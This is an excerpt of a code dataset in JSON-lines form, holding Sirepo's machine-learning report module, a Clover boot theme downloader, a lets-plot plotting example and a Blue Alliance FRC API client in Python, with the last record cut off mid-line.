run_dir, is_running):\n data = simulation_db.read_json(run_dir.join(template_common.INPUT_BASE_NAME))\n res = PKDict(\n percentComplete=0,\n frameCount=0,\n )\n if report == 'classificationAnimation' and not is_running:\n s = list(filter(\n lambda path: path.basename in _CLASSIFIER_OUTPUT_FILE.values(),\n pkio.sorted_glob(run_dir.join('*')),\n ))\n return PKDict(\n framesForClassifier=data.models.classificationAnimation.classifier,\n frameCount=1 if s else 0,\n percentComplete=100,\n )\n line = template_common.read_last_csv_line(run_dir.join(_OUTPUT_FILE.fitCSVFile))\n m = re.search(r'^(\\d+)', line)\n if m and int(m.group(1)) > 0:\n max_frame = data.models.neuralNet.epochs\n res.frameCount = int(m.group(1)) + 1\n res.percentComplete = float(res.frameCount) * 100 / max_frame\n return res\n\n\ndef get_analysis_report(run_dir, data):\n report = data.models[data.report]\n info = data.models.columnInfo\n x_idx = int(report.x)\n y_idx = int(report.y1)\n x_label = f'{info.header[x_idx]}'\n y_label = f'{info.header[y_idx]}'\n\n plot_data = _read_file_with_history(run_dir, _OUTPUT_FILE.scaledFile, report)\n x = plot_data[:, x_idx]\n y = plot_data[:, y_idx]\n plots = [\n PKDict(\n points=y.tolist(),\n label=y_label,\n style='scatter',\n )\n ]\n fields = PKDict()\n summary_data = 
PKDict()\n    if 'action' in report:\n        if report.action == 'fit':\n            p_vals, p_errs, fit_plots = _get_fit_report(report, x, y)\n            summary_data.p_vals = p_vals.tolist()\n            summary_data.p_errs = p_errs.tolist()\n            plots.extend(fit_plots)\n        elif report.action == 'cluster':\n            fields.clusters = _compute_clusters(report, plot_data)\n    return x, plots, f'{x_label} vs {y_label}', fields, summary_data\n\n\n#TODO(MVK): 2d fft (?)\ndef get_fft_report(run_dir, data):\n    info = data.models.columnInfo\n    col = data.models.fftReport.column\n    idx = int(col)\n    label = f'{info.header[idx]}'\n\n    t, y = _extract_column(run_dir, idx)\n    w, n = sirepo.analysis.get_fft(t, y)\n\n    plots = [\n        PKDict(\n            points=n,\n            label=f'{label}',\n        ),\n    ]\n\n    summaryData = PKDict(\n        freqs=[],\n        minFreq=w[0],\n        maxFreq=w[-1]\n    )\n\n    return w, plots, f'FFT', summaryData\n\n\ndef get_application_data(data, **kwargs):\n    if data.method == 'compute_column_info':\n        return _compute_column_info(data.dataFile)\n    raise AssertionError(f'unknown get_application_data: {data}')\n\n\ndef prepare_sequential_output_file(run_dir, data):\n    report = data['report']\n    if 'fileColumnReport' in report or 'partitionColumnReport' in report:\n        fn = simulation_db.json_filename(template_common.OUTPUT_BASE_NAME, run_dir)\n        if fn.exists():\n            fn.remove()\n    try:\n        save_sequential_report_data(run_dir, data)\n    except IOError:\n        # the output file isn't readable\n        pass\n\n\ndef python_source_for_model(data, model):\n    return _generate_parameters_file(data)\n\n\ndef save_sequential_report_data(run_dir, sim_in):\n    assert _is_valid_report(sim_in.report), 'unknown report: {}'.format(sim_in.report)\n    if 'fileColumnReport' in sim_in.report:\n        _extract_file_column_report(run_dir, sim_in)\n    elif 'partitionColumnReport' in sim_in.report:\n        _extract_partition_report(run_dir, sim_in)\n    elif sim_in.report == 'partitionSelectionReport':\n        _extract_partition_selection(run_dir, sim_in)\n    elif 'analysisReport' in sim_in.report:\n        _extract_analysis_report(run_dir, sim_in)\n    elif 'fftReport' in sim_in.report:\n        _extract_fft_report(run_dir, sim_in)\n\n\ndef sim_frame(frame_args):\n    return _fit_animation(frame_args)\n\n\ndef sim_frame_dtClassifierClassificationMetricsAnimation(frame_args):\n    return _classification_metrics_report(\n        frame_args,\n        _OUTPUT_FILE.dtClassifierClassificationFile,\n    )\n\n\ndef sim_frame_dtClassifierConfusionMatrixAnimation(frame_args):\n    return _confusion_matrix_to_heatmap_report(\n        frame_args,\n        _OUTPUT_FILE.dtClassifierConfusionFile,\n        'Decision Tree Confusion Matrix',\n    )\n\n\ndef sim_frame_epochAnimation(frame_args):\n    #TODO(pjm): improve heading text\n    header = ['epoch', 'loss', 'val_loss']\n    path = str(frame_args.run_dir.join(_OUTPUT_FILE.fitCSVFile))\n\n    v = sirepo.numpy.ndarray_from_csv(path, True)\n    if len(v.shape) == 1:\n        v.shape = (v.shape[0], 1)\n    return _report_info(\n        v[:, 0],\n        [PKDict(\n            points=v[:, i].tolist(),\n            label=header[i],\n        ) for i in (1, 2)],\n    ).pkupdate(PKDict(\n        x_label=header[0],\n    ))\n\ndef sim_frame_knnClassificationMetricsAnimation(frame_args):\n    return _classification_metrics_report(\n        frame_args,\n        _OUTPUT_FILE.knnClassificationFile,\n    )\n\n\ndef sim_frame_knnConfusionMatrixAnimation(frame_args):\n    return _confusion_matrix_to_heatmap_report(\n        frame_args,\n        _OUTPUT_FILE.knnConfusionFile,\n        'K={k}',\n    )\n\ndef sim_frame_knnErrorRateAnimation(frame_args):\n    return _error_rate_report(\n        frame_args,\n        _OUTPUT_FILE.knnErrorFile,\n        'K Value',\n    )\n\n\ndef sim_frame_linearSvcConfusionMatrixAnimation(frame_args):\n    return 
_confusion_matrix_to_heatmap_report(\n frame_args,\n _OUTPUT_FILE.linearSvcConfusionFile,\n 'tolerance={tol_svc_best}',\n )\n\n\ndef sim_frame_linearSvcErrorRateAnimation(frame_args):\n v = np.load(str(frame_args.run_dir.join(_OUTPUT_FILE.linearSvcErrorFile)))\n return _report_info(\n v[:, 0],\n [PKDict(\n points=v[:, 1].tolist(),\n label='Mean Error',\n )],\n ).pkupdate(PKDict(\n x_label='Tolerance',\n ))\n\n\ndef sim_frame_logisticRegressionConfusionMatrixAnimation(frame_args):\n return _confusion_matrix_to_heatmap_report(\n frame_args,\n _OUTPUT_FILE.logisticRegressionConfusionFile,\n 'C={c}',\n )\n\n\ndef sim_frame_logisticRegressionClassificationMetricsAnimation(frame_args):\n return _classification_metrics_report(\n frame_args,\n _OUTPUT_FILE.logisticRegressionClassificationFile,\n )\n\n\ndef sim_frame_logisticRegressionErrorRateAnimation(frame_args):\n return _error_rate_report(\n frame_args,\n _OUTPUT_FILE.logisticRegressionErrorFile,\n 'C',\n )\n\n\ndef write_parameters(data, run_dir, is_parallel):\n pkio.write_text(\n run_dir.join(template_common.PARAMETERS_PYTHON_FILE),\n _generate_parameters_file(data),\n )\n\n\ndef _classification_metrics_report(frame_args, filename):\n def _get_lables():\n l = []\n for k in d:\n if not isinstance(d[k], PKDict):\n continue\n for x in d[k]:\n if x not in l:\n l.append(x)\n return l\n\n def _get_matrix():\n r = []\n for k in d:\n if not isinstance(d[k], PKDict):\n continue\n try:\n x = [e[k]]\n except KeyError:\n x = [k]\n x.extend(d[k].values())\n r.append(x)\n return r\n\n e = _get_classification_output_col_encoding(frame_args)\n d = pkjson.load_any(frame_args.run_dir.join(filename))\n return PKDict(\n labels=_get_lables(),\n matrix=_get_matrix(),\n )\n\n\ndef _compute_column_info(dataFile):\n f = dataFile.file\n if re.search(r'\\.npy$', f):\n return _compute_numpy_info(f)\n return _compute_csv_info(f)\n\n\ndef _compute_csv_info(filename):\n res = PKDict(\n hasHeaderRow=True,\n rowCount=0,\n )\n row = None\n with open(_filepath(filename)) as f:\n for r in csv.reader(f):\n if not row:\n row = r\n res.rowCount += 1\n if not row or len(row) == 1:\n return PKDict(\n error='Invalid CSV file: no columns detected'\n )\n # csv file may or may not have column names\n # if any value in the first row is numeric, assume no headers\n if list(filter(lambda x: template_common.NUMERIC_RE.search(x), row)):\n row = ['column {}'.format(i + 1) for i in range(len(row))]\n res.hasHeaderRow = False\n res.colsWithNonUniqueValues = _cols_with_non_unique_values(\n filename,\n res.hasHeaderRow,\n row,\n )\n res.header = row\n res.inputOutput = ['none' for i in range(len(row))]\n return res\n\n\ndef _cols_with_non_unique_values(filename, has_header_row, header):\n # TODO(e-carlin): support npy\n assert not re.search(r'\\.npy$', str(filename)), \\\n f'numpy files are not supported path={filename}'\n v = sirepo.numpy.ndarray_from_csv(_filepath(filename), has_header_row)\n res = PKDict()\n for i, c in enumerate(np.all(v == v[0,:], axis = 0)):\n if not c:\n continue\n res[header[i]] = True\n return res\n\n\ndef _compute_clusters(report, plot_data):\n\n from sirepo.analysis import ml\n method_params = PKDict(\n agglomerative=PKDict(\n count=report.clusterCount,\n ),\n dbscan=PKDict(\n eps=report.clusterDbscanEps,\n ),\n gmix=PKDict(\n count=report.clusterCount,\n seed=report.clusterRandomSeed,\n ),\n kmeans=PKDict(\n count=report.clusterCount,\n seed=report.clusterRandomSeed,\n kmeans_init=report.clusterKmeansInit\n ),\n )\n\n cols = []\n if 'clusterFields' not in report:\n 
if len(cols) <= 1:\n raise sirepo.util.UserAlert('At least two cluster fields must be selected', 'only one cols')\n for idx in range(len(report.clusterFields)):\n if report.clusterFields[idx]:\n cols.append(idx)\n if len(cols) <= 1:\n raise sirepo.util.UserAlert('At least two cluster fields must be selected', 'only one cols')\n x_scale = sirepo.analysis.ml.scale_data(plot_data[:, cols], [\n report.clusterScaleMin,\n report.clusterScaleMax,\n ])\n group = sirepo.analysis.ml.METHODS[report.clusterMethod](\n x_scale, method_params[report.clusterMethod]\n )\n count = len(set(group)) if report.clusterMethod == 'dbscan' else report.clusterCount\n return PKDict(\n group=group.tolist(),\n count=count,\n )\n\n\ndef _compute_numpy_info(filename):\n #TODO(pjm): compute column info from numpy file\n raise NotImplementedError()\n\n\ndef _confusion_matrix_to_heatmap_report(frame_args, filename, title):\n r = pkjson.load_any(frame_args.run_dir.join(filename))\n a = None\n for y, _ in enumerate(r.matrix):\n for x, v in enumerate(r.matrix[y]):\n t = np.repeat([[x, y]], v, axis=0)\n a = t if a is None else np.vstack([t, a])\n labels = _get_classification_output_col_encoding(frame_args)\n if labels:\n labels = list(labels.values())\n else:\n labels = r.labels\n return template_common.heatmap(\n a,\n PKDict(histogramBins=len(r.matrix)),\n plot_fields=PKDict(\n labels=labels,\n title=title.format(**r),\n x_label='Predicted',\n y_label='True',\n ),\n )\n\n\ndef _error_rate_report(frame_args, filename, x_label):\n v = np.load(str(frame_args.run_dir.join(filename)))\n return _report_info(\n v[:, 0],\n [PKDict(\n points=v[:, 1].tolist(),\n label='Mean Error',\n )],\n ).pkupdate(PKDict(\n x_label=x_label,\n ))\n\n\ndef _extract_analysis_report(run_dir, sim_in):\n x, plots, title, fields, summary_data = get_analysis_report(run_dir, sim_in)\n _write_report(x, plots, title, fields=fields, summary_data=summary_data)\n\n\ndef _extract_column(run_dir, idx):\n y = _read_file_column(run_dir, 'scaledFile', idx)\n return np.arange(0, len(y)), y\n\n\ndef _extract_file_column_report(run_dir, sim_in):\n m = sim_in.models[sim_in.report]\n idx = m.columnNumber\n x, y = _extract_column(run_dir, idx)\n if np.isnan(y).any():\n template_common.write_sequential_result(PKDict(\n error='Column values are not numeric',\n ))\n return\n if 'x' in m and m.x is not None and m.x >= 0:\n _, x = _extract_column(run_dir, m.x)\n _write_report(\n x,\n [_plot_info(y, style='scatter')],\n sim_in.models.columnInfo.header[idx],\n )\n\n\ndef _extract_fft_report(run_dir, sim_in):\n x, plots, title, summary_data = get_fft_report(run_dir, sim_in)\n _write_report(x, plots, title, fields=PKDict(x_label='f [Hz]'), summary_data=summary_data)\n\n\ndef _extract_partition_report(run_dir, sim_in):\n idx = sim_in.models[sim_in.report].columnNumber\n d = PKDict(\n train=_read_file_column(run_dir, 'trainFile', idx),\n test=_read_file_column(run_dir, 'testFile', idx),\n )\n if sim_in.models.dataFile.appMode == 'regression':\n d.validate = _read_file_column(run_dir, 'validateFile', idx)\n r = []\n for name in d:\n _update_range(r, d[name])\n plots = []\n for name in d:\n x, y = _histogram_plot(d[name], r)\n plots.append(_plot_info(y, name))\n _write_report(\n x,\n plots,\n title=sim_in.models.columnInfo.header[idx],\n )\n\n\ndef _extract_partition_selection(run_dir, sim_in):\n # return report with input0 and output0\n info = sim_in.models.columnInfo\n in_idx = info.inputOutput.index('input')\n out_idx = info.inputOutput.index('output')\n x, y = 
_extract_column(run_dir, in_idx)\n _, y2 = _extract_column(run_dir, out_idx)\n _write_report(\n x,\n [\n _plot_info(y, info.header[in_idx]),\n _plot_info(y2, info.header[out_idx]),\n ],\n )\n\n\ndef _filename(name):\n return _SIM_DATA.lib_file_name_with_model_field('dataFile', 'file', name)\n\n\ndef _filepath(name):\n return _SIM_DATA.lib_file_abspath(_filename(name))\n\n\ndef _fit_animation(frame_args):\n idx = int(frame_args.columnNumber)\n frame_args.histogramBins = 30\n info = frame_args.sim_in.models.columnInfo\n header = []\n for i in range(len(info.inputOutput)):\n if info.inputOutput[i] == 'output':\n header.append(info.header[i])\n return template_common.heatmap(\n [\n _read_file(frame_args.run_dir, _OUTPUT_FILE.predictFile)[:, idx],\n _read_file(frame_args.run_dir, _OUTPUT_FILE.testFile)[:, idx],\n ],\n frame_args,\n PKDict(\n x_label='',\n y_label='',\n title=header[idx],\n hideColorBar=True,\n ),\n )\n\n\ndef _generate_parameters_file(data):\n report = data.get('report', '')\n dm = data.models\n res, v = template_common.generate_parameters_file(data)\n v.dataFile = _filename(dm.dataFile.file)\n v.pkupdate(\n inputDim=dm.columnInfo.inputOutput.count('input'),\n layerImplementationNames=_layer_implementation_list(data),\n neuralNetLayers=dm.neuralNet.layers,\n outputDim=dm.columnInfo.inputOutput.count('output'),\n ).pkupdate(_OUTPUT_FILE)\n v.columnTypes = '[' + ','.join([ \"'\" + v + \"'\" for v in dm.columnInfo.inputOutput]) + ']'\n res += template_common.render_jinja(SIM_TYPE, v, 'scale.py')\n if 'fileColumnReport' in report or report == 'partitionSelectionReport':\n return res\n if _is_sim_report(report):\n return res\n v.hasTrainingAndTesting = v.partition_section0 == 'train_and_test' \\\n or v.partition_section1 == 'train_and_test' \\\n or v.partition_section2 == 'train_and_test'\n res += template_common.render_jinja(SIM_TYPE, v, 'partition.py')\n if 'partitionColumnReport' in report:\n res += template_common.render_jinja(SIM_TYPE, v, 'save-partition.py')\n return res\n if dm.dataFile.appMode == 'classification':\n res += template_common.render_jinja(SIM_TYPE, v, 'classification-base.py')\n d = PKDict(\n decisionTree='decision-tree',\n knn='knn',\n linearSvc='linear-svc',\n logisticRegression='logistic-regression',\n )\n return res + template_common.render_jinja(\n SIM_TYPE,\n v,\n f'{d[dm.classificationAnimation.classifier]}.py',\n )\n res += template_common.render_jinja(SIM_TYPE, v, 'build-model.py')\n res += template_common.render_jinja(SIM_TYPE, v, 'train.py')\n return res\n\n\ndef _get_classification_output_col_encoding(frame_args):\n try:\n return simulation_db.read_json(\n frame_args.run_dir.join(_OUTPUT_FILE.classificationOutputColEncodingFile),\n )\n except Exception as e:\n if pkio.exception_is_not_found(e):\n # no file exists, data may be only numeric values\n return PKDict()\n raise e\n\n\ndef _get_fit_report(report, x_vals, y_vals):\n fit_x, fit_y, fit_y_min, fit_y_max, param_vals, param_sigmas = \\\n sirepo.analysis.fit_to_equation(\n x_vals,\n y_vals,\n report.fitEquation,\n report.fitVariable,\n report.fitParameters,\n )\n plots = [\n PKDict(\n points=fit_y.tolist(),\n x_points=fit_x.tolist(),\n label='fit',\n ),\n PKDict(\n points=fit_y_min.tolist(),\n x_points=fit_x.tolist(),\n label='confidence',\n _parent='confidence'\n ),\n PKDict(\n points=fit_y_max.tolist(),\n x_points=fit_x.tolist(),\n label='',\n _parent='confidence'\n ),\n ]\n return param_vals, param_sigmas, plots\n\n\ndef _histogram_plot(values, vrange):\n hist = np.histogram(values, bins=20, 
range=vrange)\n x = []\n y = []\n for i in range(len(hist[0])):\n x.append(hist[1][i])\n x.append(hist[1][i + 1])\n y.append(hist[0][i])\n y.append(hist[0][i])\n x.insert(0, x[0])\n y.insert(0, 0)\n return x, y\n\n\ndef _is_sim_report(report):\n #return 'analysisReport' in report or report in _SIM_REPORTS\n return any([r in report for r in _SIM_REPORTS])\n\n\ndef _is_valid_report(report):\n return 'fileColumnReport' in report or 'partitionColumnReport' in report or \\\n _is_sim_report(report) or report in _REPORTS\n\n\ndef _layer_implementation_list(data):\n res = {}\n for layer in data.models.neuralNet.layers:\n res[layer.layer] = 1\n return res.keys()\n\n\ndef _plot_info(y, label='', style=None):\n return PKDict(points=list(y), label=label, style=style)\n\n\ndef _read_file(run_dir, filename):\n res = np.load(str(run_dir.join(filename)))\n if len(res.shape) == 1:\n res.shape = (res.shape[0], 1)\n return res\n\n\ndef _read_file_column(run_dir, name, idx):\n return _read_file(run_dir, _OUTPUT_FILE[name])[:, idx]\n\n\ndef _read_file_with_history(run_dir, filename, report=None):\n import copy\n res = _read_file(run_dir, filename)\n if not report:\n return res\n if 'history' in report:\n for action in report.history:\n if action.action == 'trim':\n idx = int(action.trimField)\n res = res[\n (res[:,idx] >= action.trimMin) & (res[:, idx] <= action.trimMax)\n ]\n elif action.action == 'cluster':\n report2 = copy.deepcopy(report)\n report2.update(action)\n clusters = _compute_clusters(report2, res)\n labels = np.array(clusters.group)\n res = res[labels == action.clusterIndex,:]\n return res\n\n\ndef _report_info(x, plots, title='', fields=PKDict(), summary_data=PKDict()):\n res = PKDict(\n title=title,\n x_range=[float(min(x)), float(max(x))],\n y_label='',\n x_label='',\n x_points=list(x),\n plots=plots,\n y_range=template_common.compute_plot_color_and_range(plots),\n summaryData=summary_data,\n )\n res.update(fields)\n return res\n\n\ndef _update_range(vrange, values):\n minv = min(values)\n maxv = max(values)\n if not vrange:\n vrange.append(minv)\n vrange.append(maxv)\n return\n if vrange[0] > minv:\n vrange[0] = minv\n if vrange[1] < maxv:\n vrange[1] = maxv\n\n\ndef _write_report(x, plots, title='', fields=PKDict(), summary_data=PKDict()):\n template_common.write_sequential_result(_report_info(\n x, plots, title, fields=fields, summary_data=summary_data\n ))\n","sub_path":"sirepo/template/ml.py","file_name":"ml.py","file_ext":"py","file_size_in_byte":22236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"145544701","text":"import os\nfrom utils import terminal, path\nfrom sys import argv\nfrom pathlib import Path\n\n'''Download clover theme\npython download_theme.py path/to/themes/theme_name\n'''\n\n\ndef download_theme(_path, name):\n _path = Path(_path)\n _path.mkdir(parents=True, exist_ok=True)\n\n terminal.Title('Downloading theme {}...'.format(name))\n\n zipfile = Path(_path, name + '.zip')\n os.system('git archive --remote=git://git.code.sf.net/p/cloverefiboot/themes HEAD themes/{} -o {}'.format(name, zipfile))\n path.unzip(zipfile, _path.parent)\n path.rm(zipfile)\n\n terminal.Title('Theme {} downloaded into {}'.format(\n name, _path))\n\n\nif __name__ == \"__main__\":\n download_theme(path.dst.parent, path.dst.name)\n","sub_path":"Script/download_theme.py","file_name":"download_theme.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
+{"seq_id":"240406138","text":"\"\"\"\r\nGraph Building\r\r\n==============\r\r\n\r\r\n``ggplot()`` function begins a plot that you finish by adding layers.\r\r\n\r\r\nSee\r\r\n`ggplot() `__.\r\r\n\r\n\"\"\"\r\n\r\n# sphinx_gallery_thumbnail_path = \"gallery_py\\_basics\\_graph_building.png\"\r\n\r\nimport pandas as pd\r\n\r\nfrom lets_plot import *\r\nLetsPlot.setup_html()\r\n\r\n# %%\r\n\r\ndf = pd.read_csv('https://raw.githubusercontent.com/JetBrains/lets-plot-docs/master/data/mpg.csv')\r\n\r\n# %%\r\n\r\nggplot(df, aes('cty', 'hwy')) + \\\r\n geom_point(aes(color='cyl')) + \\\r\n geom_smooth(method='lm') + \\\r\n coord_cartesian() + \\\r\n scale_color_brewer(type='div', palette='Spectral')","sub_path":"docs/_downloads/c4517d2e16d241fbf9d1f5aefd4fba4c/plot__graph_building.py","file_name":"plot__graph_building.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"563914402","text":"#TBApi - BLUE ALLIANCE API FOR PYTHON\n\nimport os\nimport sys\nimport requests\nimport datetime\nimport numpy as np\nfrom numpy import array as np_array\n\n#Class that defines an FRC team. Variables are automatically set when created. raw variable contains the raw json array that TBA returned\nclass TBATeam:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.website = raw_json['website']\n self.name = raw_json['name']\n self.locality = raw_json['locality']\n self.region = raw_json['region']\n self.country_name = raw_json['country_name']\n self.location = raw_json['location']\n self.team_number = raw_json['team_number']\n self.number = raw_json['team_number']\n self.key = raw_json['key']\n self.nickname = raw_json['nickname']\n self.nick = raw_json['nickname']\n self.rookie_year = raw_json['rookie_year']\n self.motto = raw_json['motto']\n\n#Class that defines an FRC event. Variables are automatically set when created. raw variable contains the raw json array that TBA returned\nclass TBAEvent:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.key = raw_json['key']\n self.website = raw_json['website']\n self.official = raw_json['official']\n self.end_date = raw_json['end_date']\n self.name = raw_json['name']\n self.short_name = raw_json['short_name']\n self.facebook_eid = raw_json['facebook_eid']\n self.event_district_string = raw_json['event_district_string']\n self.venue_address = raw_json['venue_address']\n self.event_district = raw_json['event_district']\n self.location = raw_json['location']\n self.event_code = raw_json['event_code']\n self.year = raw_json['year']\n self.webcast = raw_json['webcast']\n self.timezone = raw_json['timezone']\n self.alliances = raw_json['alliances']\n self.event_type_string = raw_json['event_type_string']\n self.start_date = raw_json['start_date']\n self.event_type = raw_json['event_type']\n\n#Class that defines the stats from a given event. raw variable contains the raw json array that is returned by the blue alliance API. 
Due to TBA not being consistant in what they return, not all values will be present with data on each call.\nclass TBAEventStats:\n def __init__(self, raw_json):\n self.raw = raw_json\n try:\n self.opr = TBAEventStatsCategory(raw_json[\"oprs\"]) #sets up a TBAEventStatsCategory for the OPR stat if it is passed back by TBA\n except:\n pass\n try:\n self.ccwm = TBAEventStatsCategory(raw_json[\"ccwms\"]) #sets up a TBAEventStatsCategory for the CCWM stat if it is passed back by TBA\n except:\n pass\n try:\n self.dpr = TBAEventStatsCategory(raw_json[\"dprs\"]) #sets up a TBAEventStatsCategory for the DPR stat if it is passed back by TBA\n except:\n pass\n try:\n self.year_specific = raw_json['year_specific'] #sets up a TBAEventStatsCategory for the Year Specific Stats if it they are passed back by TBA\n except:\n pass\n\n#Class that defines the event stats under a given category (opr, ccwm, dpr, year_specific) with a method to get the stats under this category given a team_key or team_number\nclass TBAEventStatsCategory:\n def __init__(self, raw_json):\n self.raw = raw_json\n\n def get_team(self, team_number): #get the stats value for a given team\n if not isinstance(team_number, str):\n team_number = str(team_number)\n else:\n if team_number.startswith('frc'):\n team_number = team_number[3:]\n\n if not team_number.isdigit():\n print(\"\\n[TBA-API] BAD TEAM NUMBER SUPLIED WITH TBAEventStatsObj.get_team(team_number)\\n\")\n return\n\n team_stat = self.raw[team_number]\n return team_stat\n\n#Class that defines the rankings of a given event, and provides methods to get the TBAEventTeamRank objects for given teams or event ranks\nclass TBAEventRankings:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.keys = raw_json[0]\n\n rank_dictionary = {}\n team_rank_dictionary = {}\n\n del raw_json[0]\n\n for key in raw_json:\n team_dictionary = TBAEventTeamRank(self.keys, key) #creates a TBAEventTeamRank object for the given team as found in the rank dictionary passed back by TBA\n\n team_rank = str(key[0])\n team_number = str(key[1])\n\n rank_dictionary[team_rank] = team_dictionary #indexes the given object by event rank\n team_rank_dictionary[team_number] = team_dictionary #indexes the given object by team number\n\n self.rankings = rank_dictionary\n self.team_rankings = team_rank_dictionary\n\n def get_rank(self, rank): #gets the TBAEventTeamRank obj for a given event rank\n team_obj = self.rankings[str(rank)]\n return team_obj\n\n def get_rank_by_team(self, team_number): #gets the TBAEventTeamRank obj for a given team number\n if not isinstance(team_number, str):\n team_number = str(team_number)\n else:\n if team_number.startswith('frc'):\n team_number = team_number[3:]\n\n if not team_number.isdigit():\n print(\"\\n[TBA-API] BAD TEAM NUMBER SUPLIED WITH TBAEventRankings.get_rank_by_team(team_number)\\n\")\n return\n\n team_obj = self.team_rankings[team_number]\n\n return team_obj\n\n#Class that Creates a object with call attributes based on what is returned from TBA since it is not standardized\nclass TBAEventTeamRank:\n def __init__(self, key_list, team_list):\n self.raw = team_list\n\n check_pos = 0\n\n for key in key_list:\n if key is \"Record (W-L-T)\":\n key = \"record\"\n key = key.lower().replace(\" \", \"_\").replace(\"&\",\"and\").replace(\"/\",\"_\").replace(\"-\",\"_\")\n setattr(self, key, team_list[check_pos])\n check_pos += 1\n\n#Class that defines the District Points from a given event. 
This is by event, but the event term has been removed from the class name to prevent issues that arise with long class names\nclass TBADistrictPoints:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.points = raw_json['points']\n\n def get_team(self, team_key):\n if isinstance(team_key, str) and team_key.isdigit():\n team_key = 'frc' + team_key\n else:\n team_key = 'frc' + str(team_key)\n\n dist_points_json = self.points[team_key]\n\n dist_points_obj = TBADistrictPointsTeam(dist_points_json)\n\n return dist_points_obj\n\n#Class that defines the District points of a given team, created by get_team in TBADistrictPoints\nclass TBADistrictPointsTeam:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.alliance_points = raw_json['alliance_points']\n self.total = raw_json['total']\n self.award_points = raw_json['award_points']\n self.elim_points = raw_json['elim_points']\n self.qual_points = raw_json['qual_points']\n\n#Class that defines an FRC match. Variables are automatically set when created. raw variable contains the raw json array that TBA returned\nclass TBAMatch:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.comp_level = raw_json['comp_level']\n self.match_number = raw_json['match_number']\n self.videos = raw_json['videos']\n self.time_string = raw_json['time_string']\n self.set_number = raw_json['set_number']\n self.key = raw_json['key']\n self.time = raw_json['time']\n self.score_breakdown = raw_json['score_breakdown']\n self.alliances = raw_json['alliances']\n self.event_key = raw_json['event_key']\n\n#Class that defines an FRC award. Variables are automatically set when created. raw variable contains the raw json array that TBA returned\nclass TBAAward:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.event_key = raw_json['event_key']\n self.award_type = raw_json['award_type']\n self.type = raw_json['award_type']\n self.name = raw_json['name']\n self.recipient_list = raw_json['recipient_list']\n self.year = raw_json['year']\n\n#Class that defines an FRC media item (video, photo, etc). Variables are automatically set when created. raw variable contains the raw json array that TBA returned\nclass TBAMedia:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.type = raw_json['type']\n self.details = raw_json['details']\n self.foreign_key = raw_json['foreign_key']\n\nclass TBARobotGroup:\n def __init__(self, raw_json):\n self.raw = raw_json\n\n def get_year(self, year):\n year_json = self.raw[str(year)]\n year_obj = TBARobot(year_json)\n\n return year_obj\n\n#Class that defines an FRC robot. Variables are automatically set when created. raw variable contains the raw json array that TBA returned\nclass TBARobot:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.team_key = raw_json['team_key']\n self.name = raw_json['name']\n self.key = raw_json['key']\n self.year = raw_json['year']\n\n#This is the main class. All reuqests are made through here\nclass TBAParser:\n def __init__(self, team_number, package_name, version_number): #Init method. 
Requires info to identify the end user of the requests made to TBA\n self.team_number = team_number\n self.package_name = package_name\n self.version_number = version_number\n self.header = {'X-TBA-App-Id': 'frc{team}:{package}:{version}'.format(team = team_number, package = package_name, version = version_number)}\n self.baseURL = 'http://www.thebluealliance.com/api/v2'\n\n def __pull_team_list_by_page(self, page): #Helper function to make code for get_team_list simpler.\n request = (self.baseURL + \"/teams/\" + str(page))\n response = requests.get(request, headers = self.header)\n json_list = response.json()\n team_list = []\n\n for team in json_list:\n team_obj = TBATeam(team)\n team_list = team_list + [team_obj]\n\n return team_list\n\n def get_team_list(self, page = None): #get list of FRC teams' TBATeam objects, either the entire list, or by page #\n if not page is None:\n team_list = self.__pull_team_list_by_page\n else:\n team_list = []\n\n for page in range(0,100): #Allows for significant team-expansion (up to 55000 FRC teams). At that point in time, we will probably be on APIv3 or more.\n partial_list = self.__pull_team_list_by_page(page)\n\n try:\n if not partial_list[0] is None:\n team_list = team_list + partial_list #combine partial with previously set up 'full' list to grow list as we iterate over the range of pages\n else:\n break #kill loop once we hit NULL data\n except:\n break #kill loop once we hit NULL data\n\n return team_list\n\n def get_team(self, team_key): #get a team's TBATeam object\n request = (self.baseURL + \"/team/\" + team_key)\n response = requests.get(request, headers = self.header)\n json = response.json()\n team_object = TBATeam(json)\n\n return team_object\n\n def __pull_team_events(self, team_key, year): #helper function to pull team events for use in get_team_events with a year passed in\n request = (self.baseURL + \"/team/\" + team_key + \"/\" + str(year) + \"/events\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n event_list = []\n\n for event in json:\n event_obj = TBAEvent(event)\n event_list = event_list + [event_obj]\n\n return event_list\n\n def __pull_all_team_events(self, team_key): #helper function to pull team events for use in get_team_events without a year passed in\n request = (self.baseURL + \"/team/\" + team_key + \"/history/events\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n event_list = []\n\n for event in json:\n event_obj = TBAEvent(event)\n event_list = event_list + [event_obj]\n\n return event_list\n\n def get_team_events(self, team_key, year=None): #Get a list of event objects that a given team has competed in\n if not year is None:\n event_list = self.__pull_team_events(team_key, year)\n else:\n event_list = self.__pull_all_team_events(team_key)\n return event_list\n\n def get_team_event_awards(self, team_key, event_key): #Get a list of all award objects that a team has won at a given event\n request = (self.baseURL + \"/team/\" + team_key + \"/event/\" + event_key + \"/awards\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n award_list = []\n\n for award in json:\n award_obj = TBAAward(award)\n award_list = award_list + [award_obj]\n\n return award_list\n\n def get_team_event_matches(self, team_key, event_key): #Get a list of all match objects that a team competed in at a given event\n request = (self.baseURL + \"/team/\" + team_key + \"/event/\" + event_key + \"/matches\")\n response = requests.get(request, 
